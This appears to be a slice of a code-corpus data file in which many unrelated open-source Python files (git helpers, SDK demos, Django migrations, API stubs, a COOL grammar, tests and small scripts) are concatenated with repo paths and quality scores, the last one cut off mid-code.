expected = {'nagios.http.size', 'nagios.ping.pl', 'nagios.http.time', 'nagios.current_load.load15',
'nagios.swap_usage.swap', 'nagios.host.pl', 'nagios.root_partition', 'nagios.current_users.users',
'nagios.current_load.load1', 'nagios.host.rta', 'nagios.ping.rta', 'nagios.current_load.load5',
'nagios.total_processes.procs'}
assert all([expectedMetric for expectedMetric in expected if expectedMetric in get_keys("agent-integrations")])
util.wait_until(wait_for_metrics, 180, 3)
| 2.25 | 2 |
erudition/util.py | papsebestyen/erudition | 0 | 5555 | import os
import sys
from contextlib import contextmanager
from invoke import UnexpectedExit
def git_commit(c, addstr, msg):
try:
c.run("git config --get user.email")
c.run("git config --get user.name")
except UnexpectedExit:
c.run('git config --local user.email "<EMAIL>"')
c.run('git config --local user.name "CI/CD"')
c.run(f'git add {addstr} && git commit -m "{msg}"')
@contextmanager
def cd_into(dirpath):
wd = os.getcwd()
os.chdir(dirpath)
sys.path.insert(0, str(dirpath))
yield
os.chdir(wd)
sys.path.pop(0)
| 2.28125 | 2 |
python3/distortion_correct_aksk_demo.py | MeekoI/ais-sdk | 0 | 5556 | <filename>python3/distortion_correct_aksk_demo.py
# -*- coding:utf-8 -*-
from ais_sdk.utils import encode_to_base64
from ais_sdk.utils import decode_to_wave_file
from ais_sdk.distortion_correct import distortion_correct_aksk
from ais_sdk.utils import init_global_env
import json
if __name__ == '__main__':
#
# access moderation distortion correct.post data by ak,sk
#
app_key = '*************'
app_secret = '************'
init_global_env(region='cn-north-1')
demo_data_url = 'https://ais-sample-data.obs.cn-north-1.myhuaweicloud.com/vat-invoice.jpg'
#call interface use the url correction is true means do not correction
result = distortion_correct_aksk(app_key, app_secret, "", demo_data_url, True)
result_obj = json.loads(result)
if result_obj['result']['data'] != '':
decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-1.png')
else:
print(result)
# call interface use the file
result = distortion_correct_aksk(app_key, app_secret, encode_to_base64('data/moderation-distortion.jpg'), '', True)
result_obj = json.loads(result)
if result_obj['result']['data'] != '':
decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-2.png')
else:
print(result) | 2.5 | 2 |
exercise/migrations/0016_auto_20191025_1624.py | Arpit8081/Phishtray_Edited_Version | 2 | 5557 | <filename>exercise/migrations/0016_auto_20191025_1624.py
# Generated by Django 2.2.6 on 2019-10-25 16:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exercise', '0015_exerciseemailproperties_date_received'),
]
operations = [
migrations.AlterField(
model_name='exercise',
name='copied_from',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='exercise.Exercise'),
),
]
| 1.3125 | 1 |
release/stubs.min/Autodesk/Revit/DB/__init___parts/GeomCombinationSet.py | YKato521/ironpython-stubs | 0 | 5558 | class GeomCombinationSet(APIObject, IDisposable, IEnumerable):
"""
A set that contains GeomCombination objects.
GeomCombinationSet()
"""
def Clear(self):
"""
Clear(self: GeomCombinationSet)
Removes every item GeomCombination the set,rendering it empty.
"""
pass
def Contains(self, item):
"""
Contains(self: GeomCombinationSet,item: GeomCombination) -> bool
Tests for the existence of an GeomCombination within the set.
item: The element to be searched for.
Returns: The Contains method returns True if the GeomCombination is within the set,
otherwise False.
"""
pass
def Dispose(self):
""" Dispose(self: GeomCombinationSet,A_0: bool) """
pass
def Erase(self, item):
"""
Erase(self: GeomCombinationSet,item: GeomCombination) -> int
Removes a specified GeomCombination from the set.
item: The GeomCombination to be erased.
Returns: The number of GeomCombinations that were erased from the set.
"""
pass
def ForwardIterator(self):
"""
ForwardIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator
Retrieve a forward moving iterator to the set.
Returns: Returns a forward moving iterator to the set.
"""
pass
def GetEnumerator(self):
"""
GetEnumerator(self: GeomCombinationSet) -> IEnumerator
Retrieve a forward moving iterator to the set.
Returns: Returns a forward moving iterator to the set.
"""
pass
def Insert(self, item):
"""
Insert(self: GeomCombinationSet,item: GeomCombination) -> bool
Insert the specified element into the set.
item: The GeomCombination to be inserted into the set.
Returns: Returns whether the GeomCombination was inserted into the set.
"""
pass
def ReleaseManagedResources(self, *args):
""" ReleaseManagedResources(self: APIObject) """
pass
def ReleaseUnmanagedResources(self, *args):
""" ReleaseUnmanagedResources(self: GeomCombinationSet) """
pass
def ReverseIterator(self):
"""
ReverseIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator
Retrieve a backward moving iterator to the set.
Returns: Returns a backward moving iterator to the set.
"""
pass
def __enter__(self, *args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self, *args):
""" __iter__(self: IEnumerable) -> object """
pass
IsEmpty = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Test to see if the set is empty.
Get: IsEmpty(self: GeomCombinationSet) -> bool
"""
Size = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Returns the number of GeomCombinations that are in the set.
Get: Size(self: GeomCombinationSet) -> int
"""
| 2.75 | 3 |
rainbow/datasources/cfn_datasource.py | omribahumi/rainbow | 35 | 5559 | <reponame>omribahumi/rainbow<filename>rainbow/datasources/cfn_datasource.py
from rainbow.cloudformation import Cloudformation
from base import DataSourceBase
__all__ = ['CfnOutputsDataSource', 'CfnResourcesDataSource', 'CfnParametersDataSource']
class CfnDataSourceBase(DataSourceBase):
def __init__(self, data_source):
super(CfnDataSourceBase, self).__init__(data_source)
stack_name = data_source
region = Cloudformation.default_region
if ':' in data_source:
region, stack_name = data_source.split(':', 1)
cfn_connection = Cloudformation(region)
if not cfn_connection:
raise Exception('Invalid region %r' % (region,))
self.stack = cfn_connection.describe_stack(stack_name)
class CfnOutputsDataSource(CfnDataSourceBase):
datasource_name = 'cfn_outputs'
def __init__(self, data_source):
super(CfnOutputsDataSource, self).__init__(data_source)
self.data = {i.key: i.value for i in self.stack.outputs}
class CfnResourcesDataSource(CfnDataSourceBase):
datasource_name = 'cfn_resources'
def __init__(self, data_source):
super(CfnResourcesDataSource, self).__init__(data_source)
self.data = {r.logical_resource_id: r.physical_resource_id for r in self.stack.describe_resources()}
class CfnParametersDataSource(CfnDataSourceBase):
datasource_name = 'cfn_parameters'
def __init__(self, data_source):
super(CfnParametersDataSource, self).__init__(data_source)
self.data = {p.key: p.value for p in self.stack.parameters}
| 2.234375 | 2 |
epio_commands/management/commands/epio_flush_redis.py | idan/pypostbin | 2 | 5560 | import redis
from bundle_config import config
from django.core.management.base import NoArgsCommand
class Command(NoArgsCommand):
help = 'Flushes all keys in redis.'
def handle_noargs(self, **options):
r = redis.Redis(host=config['redis']['host'], port=int(config['redis']['port']), password=config['redis']['password'])
r.flushall()
print "All redis keys flushed."
| 2.171875 | 2 |
python/flexflow_cffi_build.py | zmxdream/FlexFlow | 455 | 5561 | <filename>python/flexflow_cffi_build.py
#!/usr/bin/env python
# Copyright 2020 Stanford University, Los Alamos National Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import os
import subprocess
def find_flexflow_header(ffhome_dir):
def try_prefix(prefix_dir):
flexflow_ch_path = os.path.join(prefix_dir, 'python', 'flexflow_c.h')
flexflow_cxxh_path = os.path.join(prefix_dir, 'include', 'model.h')
if os.path.exists(flexflow_ch_path) and os.path.exists(flexflow_cxxh_path):
flexflow_cxxh_dir = os.path.join(prefix_dir, 'include')
return flexflow_cxxh_dir, flexflow_ch_path
result = try_prefix(ffhome_dir)
if result:
return result
raise Exception('Unable to locate flexflow_c.h and flexflow.h header file')
def build(output_dir, libname, ffhome_dir):
flexflow_cxxh_dir, flexflow_ch_path = find_flexflow_header(ffhome_dir)
header = subprocess.check_output(['gcc', '-I', flexflow_cxxh_dir, '-E', '-P', flexflow_ch_path]).decode('utf-8')
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'flexflow_cffi_header.py.in')) as f:
content = f.read()
content = content.format(header=repr(header), libname=repr(libname))
if output_dir is None:
output_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(output_dir, 'flexflow_cffi_header.py'), 'wb') as f:
f.write(content.encode('utf-8'))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--ffhome-dir', required=True)
parser.add_argument('--libname', required=True)
parser.add_argument('--output-dir', required=False)
args = parser.parse_args()
build(args.output_dir, args.libname, args.ffhome_dir)
| 2.1875 | 2 |
gaphor/plugins/xmiexport/__init__.py | tuxcell/gaphor | 0 | 5562 | <filename>gaphor/plugins/xmiexport/__init__.py
"""This plugin extends Gaphor with XMI export functionality."""
import logging
from gaphor.abc import ActionProvider, Service
from gaphor.core import action, gettext
from gaphor.plugins.xmiexport import exportmodel
from gaphor.ui.filedialog import FileDialog
logger = logging.getLogger(__name__)
class XMIExport(Service, ActionProvider):
def __init__(self, element_factory, file_manager, export_menu):
self.element_factory = element_factory
self.file_manager = file_manager
export_menu.add_actions(self)
def shutdown(self):
pass
@action(
name="file-export-xmi",
label=gettext("Export to XMI"),
tooltip=gettext("Export model to XMI (XML Model Interchange) format"),
)
def execute(self):
filename = self.file_manager.filename
filename = filename.replace(".gaphor", ".xmi") if filename else "model.xmi"
file_dialog = FileDialog(
gettext("Export model to XMI file"), action="save", filename=filename
)
filename = file_dialog.selection
if filename and len(filename) > 0:
logger.debug(f"Exporting XMI model to: {filename}")
export = exportmodel.XMIExport(self.element_factory)
try:
export.export(filename)
except Exception as e:
logger.error(f"Error while saving model to file {filename}: {e}")
| 2.21875 | 2 |
tests/utils.py | btk15049/online-judge-tools | 0 | 5563 | <gh_stars>0
import contextlib
import os
import pathlib
import subprocess
import sys
import tempfile
@contextlib.contextmanager
def chdir(path):
cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(cwd)
def prepare_files(files):
for f in files:
path = pathlib.Path(f['path'])
path.parent.mkdir(parents=True, exist_ok=True)
with open(str(path), 'w') as fh:
fh.write(f['data'])
if f.get('executable', False):
path.chmod(0o755)
@contextlib.contextmanager
def sandbox(files):
with tempfile.TemporaryDirectory() as tempdir:
with chdir(tempdir):
prepare_files(files)
yield tempdir
def get_oj_exe():
oj_exe = os.environ.get('TEST_OJ_EXE')
if oj_exe is not None:
return [str(pathlib.Path(oj_exe).resolve())]
else:
return [sys.executable, '-m', 'onlinejudge._implementation.main']
def run(args, *, env=None, check=False, oj_exe=get_oj_exe()):
# oj_exe should be evaluated out of sandboxes
env = env or dict(os.environ)
env['PYTHONPATH'] = str(pathlib.Path(__file__).parent.parent) # this is required to run in sandboxes
return subprocess.run(oj_exe + args, stdout=subprocess.PIPE, stderr=sys.stderr, env=env, check=check)
def run_in_sandbox(args, files):
with sandbox(files) as tempdir:
proc = run(args)
return {
'proc': proc,
'tempdir': tempdir,
}
def cat():
if os.name == 'nt':
return '{} -c "import sys; sys.stdout.buffer.write(sys.stdin.buffer.read())"'.format(sys.executable)
else:
return 'cat'
def sleep_1sec():
if os.name == 'nt':
return '{} -c "import time; time.sleep(1)"'.format(sys.executable)
else:
return 'sleep 1.0'
def python_c(cmd):
assert '"' not in cmd
return '{} -c "{}"'.format(sys.executable, cmd)
def python_script(path):
assert '"' not in path
return '{} "{}"'.format(sys.executable, path)
def is_logged_in(service, memo={}):
# functools.lru_cache is unusable since Service are unhashable
url = service.get_url()
if url not in memo:
proc = run(['login', '--check', url])
memo[url] = proc.returncode == 0
return memo[url]
| 2.375 | 2 |
git_operation.py | zerzerzerz/Computer-Virus | 0 | 5564 | <gh_stars>0
import os
commit_string = "选择data的前多少个维度参与训练"
not_add = ['results', 'data', 'weights']
for item in os.listdir():
if item in not_add:
# print(item)
continue
else:
os.system(f"git add {item}")
os.system(f'git commit -m "{commit_string}"')
os.system("git push origin main") | 2.546875 | 3 |
src/cool_grammar.py | peanut-butter-jellyyy/cool-compiler-2021 | 0 | 5565 | <gh_stars>0
from src.cmp.pycompiler import Grammar
from src.ast_nodes import (
ProgramNode,
ClassDeclarationNode,
FuncDeclarationNode,
AttrDeclarationNode,
IfNode,
WhileNode,
LetNode,
CaseNode,
IsvoidNode,
AssignNode,
VarDeclarationNode,
CaseItemNode,
NotNode,
LessNode,
LessEqualNode,
EqualNode,
PlusNode,
MinusNode,
StarNode,
DivNode,
NegNode,
InstantiateNode,
BlockNode,
CallNode,
ConstantNumNode,
VariableNode,
BooleanNode,
StringNode,
)
def define_cool_grammar(print_grammar=False):
# grammar
G = Grammar()
# non-terminals
program = G.NonTerminal("<program>", startSymbol=True)
class_list, def_class = G.NonTerminals("<class-list> <def-class>")
feature_list, def_attr, def_func = G.NonTerminals(
"<feature-list> <def-attr> <def-func>"
)
param_list, param = G.NonTerminals("<param-list> <param>")
expr, comp, arith, term, factor, element, atom = G.NonTerminals(
"<expr> <comp> <arith> <term> <factor> <element> <atom>"
)
identifiers_list, identifier_init = G.NonTerminals("<ident-list> <ident-init>")
block, case_block, case_item = G.NonTerminals("<block> <case-block> <case-item>")
func_call, arg_list = G.NonTerminals("<func-call> <arg-list>")
# terminals
classx, inherits, notx, isvoid = G.Terminals("class inherits not isvoid")
let, inx = G.Terminals("let in")
ifx, then, elsex, fi = G.Terminals("if then else fi")
whilex, loop, pool = G.Terminals("while loop pool")
case, of, esac = G.Terminals("case of esac")
semi, colon, comma, dot, opar, cpar, ocur, ccur, at, larrow, rarrow = G.Terminals(
"; : , . ( ) { } @ <- =>"
)
equal, plus, minus, star, div, less, equal, lesseq, neg = G.Terminals(
"= + - * / < = <= ~"
)
idx, num, new, string, true, false = G.Terminals("id int new string true false")
# productions
program %= class_list, lambda h, s: ProgramNode(s[1])
class_list %= def_class + class_list, lambda h, s: [s[1]] + s[2]
class_list %= def_class, lambda h, s: [s[1]]
def_class %= (
classx + idx + ocur + feature_list + ccur + semi,
lambda h, s: ClassDeclarationNode(s[2], s[4]),
)
def_class %= (
classx + idx + inherits + idx + ocur + feature_list + ccur + semi,
lambda h, s: ClassDeclarationNode(s[2], s[6], s[4]),
)
feature_list %= def_attr + semi + feature_list, lambda h, s: [s[1]] + s[3]
feature_list %= def_func + semi + feature_list, lambda h, s: [s[1]] + s[3]
feature_list %= G.Epsilon, lambda h, s: []
def_attr %= (
idx + colon + idx + larrow + expr,
lambda h, s: AttrDeclarationNode(s[1], s[3], s[5]),
)
def_attr %= idx + colon + idx, lambda h, s: AttrDeclarationNode(s[1], s[3])
def_func %= (
idx + opar + param_list + cpar + colon + idx + ocur + expr + ccur,
lambda h, s: FuncDeclarationNode(s[1], s[3], s[6], s[8]),
)
param_list %= param + comma + param_list, lambda h, s: [s[1]] + s[3]
param_list %= param, lambda h, s: [s[1]]
param_list %= G.Epsilon, lambda h, s: []
param %= idx + colon + idx, lambda h, s: (s[1], s[3])
expr %= idx + larrow + expr, lambda h, s: AssignNode(s[1], s[3])
expr %= let + identifiers_list + inx + expr, lambda h, s: LetNode(s[2], s[4])
expr %= (
ifx + expr + then + expr + elsex + expr + fi,
lambda h, s: IfNode(s[2], s[4], s[6]),
)
expr %= whilex + expr + loop + expr + pool, lambda h, s: WhileNode(s[2], s[4])
expr %= case + expr + of + case_block + esac, lambda h, s: CaseNode(s[2], s[4])
expr %= notx + expr, lambda h, s: NotNode(s[2])
expr %= comp, lambda h, s: s[1]
identifiers_list %= (
identifier_init + comma + identifiers_list,
lambda h, s: [s[1]] + s[3],
)
identifiers_list %= identifier_init, lambda h, s: [s[1]]
identifier_init %= (
idx + colon + idx + larrow + expr,
lambda h, s: VarDeclarationNode(s[1], s[3], s[5]),
)
identifier_init %= idx + colon + idx, lambda h, s: VarDeclarationNode(s[1], s[3])
case_block %= case_item + case_block, lambda h, s: [s[1]] + s[2]
case_block %= case_item, lambda h, s: [s[1]]
case_item %= (
idx + colon + idx + rarrow + expr + semi,
lambda h, s: CaseItemNode(s[1], s[3], s[5]),
)
comp %= comp + less + arith, lambda h, s: LessNode(s[1], s[3])
comp %= comp + equal + arith, lambda h, s: EqualNode(s[1], s[3])
comp %= comp + lesseq + arith, lambda h, s: LessEqualNode(s[1], s[3])
comp %= arith, lambda h, s: s[1]
arith %= arith + plus + term, lambda h, s: PlusNode(s[1], s[3])
arith %= arith + minus + term, lambda h, s: MinusNode(s[1], s[3])
arith %= term, lambda h, s: s[1]
term %= term + star + factor, lambda h, s: StarNode(s[1], s[3])
term %= term + div + factor, lambda h, s: DivNode(s[1], s[3])
term %= factor, lambda h, s: s[1]
factor %= isvoid + element, lambda h, s: IsvoidNode(s[2])
factor %= neg + element, lambda h, s: NegNode(s[2])
factor %= new + idx, lambda h, s: InstantiateNode(s[2])
factor %= element, lambda h, s: s[1]
element %= opar + expr + cpar, lambda h, s: s[2]
element %= ocur + block + ccur, lambda h, s: BlockNode(s[2])
element %= (element + dot + func_call, lambda h, s: CallNode(*s[3], obj=s[1]))
element %= (
element + at + idx + dot + func_call,
lambda h, s: CallNode(*s[5], obj=s[1], at_type=s[3]),
)
element %= func_call, lambda h, s: CallNode(*s[1])
element %= atom, lambda h, s: s[1]
atom %= num, lambda h, s: ConstantNumNode(s[1])
atom %= idx, lambda h, s: VariableNode(s[1])
atom %= (
true,
lambda h, s: BooleanNode(s[1]),
)
atom %= false, lambda h, s: BooleanNode(s[1])
atom %= string, lambda h, s: StringNode(s[1])
block %= expr + semi, lambda h, s: [s[1]]
block %= expr + semi + block, lambda h, s: [s[1]] + s[3]
func_call %= idx + opar + arg_list + cpar, lambda h, s: (s[1], s[3])
arg_list %= expr + comma + arg_list, lambda h, s: [s[1]] + s[3]
arg_list %= expr, lambda h, s: [s[1]]
arg_list %= G.Epsilon, lambda h, s: []
if print_grammar:
print(G)
return (G, idx, string, num)
| 2.5 | 2 |
userbot/plugins/selfdestruct.py | Aliensuniquebot/CatUserbot | 1 | 5566 | <gh_stars>1-10
# For @UniBorg
# courtesy <NAME>
"""Self Destruct Plugin
.sd <time in seconds> <text>
"""
import time
from userbot import CMD_HELP
from telethon.errors import rpcbaseerrors
from userbot.utils import admin_cmd
import importlib.util
@borg.on(admin_cmd(pattern="sdm", outgoing=True))
async def selfdestruct(destroy):
if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"):
message = destroy.text
counter = int(message[5:7])
text = str(destroy.text[7:])
text = (
text
)
await destroy.delete()
smsg = await destroy.client.send_message(destroy.chat_id, text)
time.sleep(counter)
await smsg.delete()
@borg.on(admin_cmd(pattern="selfd", outgoing=True ))
async def selfdestruct(destroy):
if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"):
message = destroy.text
counter = int(message[7:9])
text = str(destroy.text[9:])
text = (
text
+ "\n\n`This message shall be self-destructed in "
+ str(counter)
+ " seconds`"
)
await destroy.delete()
smsg = await destroy.client.send_message(destroy.chat_id, text)
time.sleep(counter)
await smsg.delete()
CMD_HELP.update({
"selfdestruct":
".sdm number | [text]\
\nUsage: self destruct this message in number seconds \
\n\n.self number | [text]\
\nUsage:self destruct this message in number seconds with showing that it will destruct. \
"
})
| 2.21875 | 2 |
snippets/basic_render_template_class.py | OSAMAMOHAMED1234/python_projects | 0 | 5567 | <reponame>OSAMAMOHAMED1234/python_projects
import os
class Template:
template_name = ''
context = None
def __init__(self, template_name='', context=None, *args, **kwargs):
self.template_name = template_name
self.context = context
def get_template(self):
template_path = os.path.join(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates'), self.template_name)
if not os.path.exists(template_path):
raise Exception(f'This path does not exist : {template_path}')
template_string = ''
with open(template_path, 'r') as f:
template_string = f.read()
return template_string
def render(self, context=None):
render_ctx = context
if self.context != None:
render_ctx = self.context
if not isinstance(render_ctx, dict):
render_ctx = {}
template_string = self.get_template()
return template_string.format(**render_ctx)
obj = Template(template_name='test.html', context={'name': 'OSAMA'})
print(obj.render())
obj.context= None
print(obj.render(context={'name': 'os'}))
obj2 = Template(template_name='test.html')
print(obj2.render(context={'name': 'os'})) | 3.078125 | 3 |
level_one/strings.py | jameskzhao/python36 | 0 | 5568 | <reponame>jameskzhao/python36
#Basics
a = "hello"
a += " I'm a dog"
print(a)
print(len(a))
print(a[1:]) #Output: ello I'm a dog
print(a[:5]) #Output: hello(index 5 is not included)
print(a[2:5])#Output: llo(index 2 is included)
print(a[::2])#Step size
#string is immutable so you can't assign a[1]= b
x = a.upper()
print(x)
x = a.capitalize()
print(x)
x = a.split('e')
print(x)
x = a.split() #splits the string by space
print(x)
x = a.strip() #removes any whitespace from beginning or the end
print(x)
x = a.replace('l','xxx')
print(x)
x = "Insert another string here: {}".format('insert me!')
x = "Item One: {} Item Two: {}".format('dog', 'cat')
print(x)
x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat')
print(x)
#command-line string input
print("Enter your name:")
x = input()
print("Hello: {}".format(x)) | 4.09375 | 4 |
tests/test_01_accept_time_get_headers.py | glushkovvv/test_2gis | 0 | 5569 | <filename>tests/test_01_accept_time_get_headers.py
# -*- coding: utf-8 -*-
"""
test_01_accept_time_get_headers
~~~~~~~~~~~~~~
The 2GIS API Test
Check time get headers
:author: <NAME>
:copyright: Copyright 2019, The2GIS API Test"
:license: MIT
:version: 1.0.0
:maintainer: <NAME>
:email: <EMAIL>
:status: Development
"""
import pytest
import allure
from tools.api_responses import get_response
@allure.epic("Поизитивные тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 5},
{"country_code": "ru", "page": 1, "page_size": 5},
{"q": "ОРСК"}])
def test_01_time_response_for_valid_request(setup_option, json_params):
"""
Проверяем время ответов сервера при валидных запросах
:param setup_option: Установочные параметры
:type setup_option: dict
:param json_params: Параметры GET запроса
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.2
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.2 сек\r\n""" + testing_message
@allure.epic("Смок тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 2},
{"country_code": "tz", "page": 1, "page_size": 5},
{"q": "ОР"}])
def test_01_time_response_for_invalid_request(setup_option, json_params):
"""
Проверяем время ответов сервера при невалидных запросах
:param setup_option: Установочные параметры
:type setup_option: dict
:param json_params: Параметры GET запроса
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.5
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.5 сек\r\n""" + testing_message
| 2.0625 | 2 |
transformers/string/strlen_transformer.py | ucds-sg/h2oai | 0 | 5570 | <gh_stars>0
"""Returns the string length of categorical values"""
from h2oaicore.transformer_utils import CustomTransformer
import datatable as dt
import numpy as np
class MyStrLenEncoderTransformer(CustomTransformer):
@staticmethod
def get_default_properties():
return dict(col_type="any", min_cols=1, max_cols=1, relative_importance=1)
def fit_transform(self, X: dt.Frame, y: np.array = None):
return self.transform(X)
def transform(self, X: dt.Frame):
return X.to_pandas().astype(str).iloc[:, 0].str.len()
| 2.953125 | 3 |
geometry/eolearn/geometry/__init__.py | eerzin/eo-learn | 1 | 5571 | <filename>geometry/eolearn/geometry/__init__.py
"""
Subpackage containing EOTasks for geometrical transformations
"""
from .utilities import ErosionTask, VectorToRaster, RasterToVector
from .sampling import PointSamplingTask, PointSampler, PointRasterSampler
__version__ = '0.4.2'
| 1.210938 | 1 |
api/models/users.py | felipebarraza6/startup_comedy | 0 | 5572 | <reponame>felipebarraza6/startup_comedy
"""User Model."""
# Django
from django.db import models
from django.contrib.auth.models import AbstractUser
# Utilities
from .utils import ApiModel
class User(ApiModel, AbstractUser):
email = models.EmailField(
'email',
unique = True,
)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username', 'first_name', 'last_name']
is_student = models.BooleanField(default=False)
class Meta:
verbose_name='Usuario'
verbose_name_plural='Usuarios'
def __str__(self):
return self.username
def get_short_name(self):
return self.username
class ProfileUser(ApiModel):
user = models.OneToOneField(User, on_delete=models.CASCADE)
approved_courses = models.ManyToManyField('api.ResultContest',
related_name='user_aproved_courses', blank=True, null=True)
tests_performed = models.ManyToManyField('api.ResultTest',
related_name='user_result_test', blank=True)
class Meta:
verbose_name = 'Usuario - Perfil'
verbose_name_plural = 'Usuarios - Perfiles'
def __str__(self):
return str(self.user)
| 2.5 | 2 |
tests/test_server.py | m-bo-one/ethereumd-proxy | 21 | 5573 | <reponame>m-bo-one/ethereumd-proxy
from collections import namedtuple
import json
from asynctest.mock import patch
import pytest
from ethereumd.server import RPCServer
from ethereumd.proxy import EthereumProxy
from aioethereum.errors import BadResponseError
from .base import BaseTestRunner
Request = namedtuple('Request', ['json'])
class TestServer(BaseTestRunner):
run_with_node = True
async def init_server(self, loop):
server = RPCServer()
with patch('ethereumd.poller.Poller.poll'):
await server.before_server_start()(None, loop)
return server
@pytest.mark.asyncio
async def test_server_handler_index_success_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error'] is None
assert isinstance(parsed['result'], int)
@pytest.mark.asyncio
async def test_server_handler_index_invalid_rpc_data(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'id': 'test',
}
request = Request(json=data)
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -32602
assert parsed['error']['message'] == 'Invalid rpc 2.0 structure'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_attr_error_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise AttributeError('bla bla method not found')
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -32601
assert parsed['error']['message'] == 'Method not found'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_type_error_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise TypeError('test')
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -1
assert parsed['error']['message'] == 'test'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_bad_response_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise BadResponseError('test', code=-99999999)
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -99999999
assert parsed['error']['message'] == 'test'
assert parsed['result'] is None
| 2.078125 | 2 |
neorl/rl/baselines/readme.py | evdcush/neorl | 20 | 5574 | <filename>neorl/rl/baselines/readme.py
# This file is part of NEORL.
# Copyright (c) 2021 Exelon Corporation and MIT Nuclear Science and Engineering
# NEORL is free software: you can redistribute it and/or modify
# it under the terms of the MIT LICENSE
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#NEORL team thanks stable-baselines as we have used their own implementation of different RL
#algorathims to establish NEORL optimizers. We have used the files in this open-source repo:
#https://github.com/hill-a/stable-baselines | 1.296875 | 1 |
Compare.py | sushantPatrikar/WaveCompartor | 3 | 5575 | from scipy.io import wavfile
import numpy as np
import pingouin as pg
import pandas as pd
_,data = wavfile.read('wav//ed//mp3baked.wav')
_,data1 = wavfile.read('wav//ing//ingeating.wav')
i= data.shape[0]-1
j = data1.shape[0]-1
index_1 = -1
index_2 = -1
try:
data.shape[1]
except IndexError:
data = data.reshape(data.shape[0],1)
try:
data1.shape[1]
except IndexError:
